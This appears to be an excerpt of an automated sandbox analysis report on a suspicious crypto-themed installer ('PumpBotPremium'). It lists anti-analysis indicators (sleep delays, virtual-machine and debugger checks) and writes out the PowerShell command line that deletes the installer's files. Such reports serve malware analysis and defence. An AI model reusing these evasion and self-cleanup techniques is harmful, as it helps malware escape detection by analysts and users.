Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899884 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899772 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899652 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899522 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899373 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899262 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899151 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899888
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899747
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899636
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899526
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899377
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899140
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899031
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898921
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898812
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898703
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898593
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898484
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898374
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898265
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898046
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897937
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897708
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897468
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897352
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899869
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899281
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899172
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899062
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898953
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898844
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898625
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898516
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898266
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898047
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897937
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897712
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899875
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899765
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899656
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899547
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899437
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899218
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899109
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898781
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898672
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898343
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898125
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898015
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897906
Source: aipackagechainer.exe, 00000003.00000002.1915356853.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\+?
Source: powershell.exe, 0000000B.00000002.2057239785.0000000008422000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW4
Source: powershell.exe, 0000000B.00000002.2057239785.0000000008422000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2052852092.0000000007449000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D78981000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmncVMware Screen Codec / VMware VideoInvalid packet
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D78981000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Screen Codec / VMware Video
Source: BlockchainConnector.exe, 00000007.00000002.1904081490.0000019A0BE63000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894339402.0000019A0BE61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027D03D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0027D03D
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00238550 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,FlushFileBuffers,WriteFile,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,OutputDebugStringW,WriteFile,WriteFile,FlushFileBuffers,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers, 3_2_00238550
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00237530 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,LoadImageW,FreeLibrary, 3_2_00237530
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027A0EE mov esi, dword ptr fs:[00000030h] 3_2_0027A0EE
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0028A795 mov ecx, dword ptr fs:[00000030h] 3_2_0028A795
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0028F94C mov eax, dword ptr fs:[00000030h] 3_2_0028F94C
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0028F990 mov eax, dword ptr fs:[00000030h] 3_2_0028F990
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027A15A GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree, 3_2_0027A15A
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\msiexec.exe Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027C207 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0027C207
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0021C700 __set_se_translator,SetUnhandledExceptionFilter, 3_2_0021C700
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027D03D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0027D03D
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027D1D0 SetUnhandledExceptionFilter, 3_2_0027D1D0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00281363 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00281363
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002591C0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,AllowSetForegroundWindow, 3_2_002591C0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_D021.ps1 -paths 'C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium','C:\Users\user\AppData\Roaming\Coinsw.app' -retry_count 10" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -noninteractive -nologo -executionpolicy remotesigned -command "c:\windows\systemtemp\ai_d021.ps1 -paths 'c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium\prerequisites\file_deleter.ps1','c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium\prerequisites\aipackagechainer.exe','c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium','c:\users\user\appdata\roaming\coinsw.app' -retry_count 10"
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -noninteractive -nologo -executionpolicy remotesigned -command "c:\windows\systemtemp\ai_d021.ps1 -paths 'c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium\prerequisites\file_deleter.ps1','c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium\prerequisites\aipackagechainer.exe','c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium','c:\users\user\appdata\roaming\coinsw.app' -retry_count 10" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002323D0 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle, 3_2_002323D0
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027CCD0 cpuid 3_2_0027CCD0
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 3_2_002965BB
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW, 3_2_002967B6
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: EnumSystemLocalesW, 3_2_0029685D
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: EnumSystemLocalesW, 3_2_002968A8
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: EnumSystemLocalesW, 3_2_00296943
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_002969CE
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW,GetLocaleInfoW, 3_2_0025EB00
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW, 3_2_00296C21
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_00296D4A
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW, 3_2_00296E50
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_00296F1F
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: EnumSystemLocalesW, 3_2_0028D47B
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW, 3_2_0028D9C2
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ecb.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cbc.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cfb.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ofb.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ctr.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_strxor.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_BLAKE2s.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA1.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA256.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_MD5.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Protocol\_scrypt.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_cpuid_c.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_portable.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_clmul.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ocb.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aesni.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\.libs VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\.libs VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation Jump to behavior
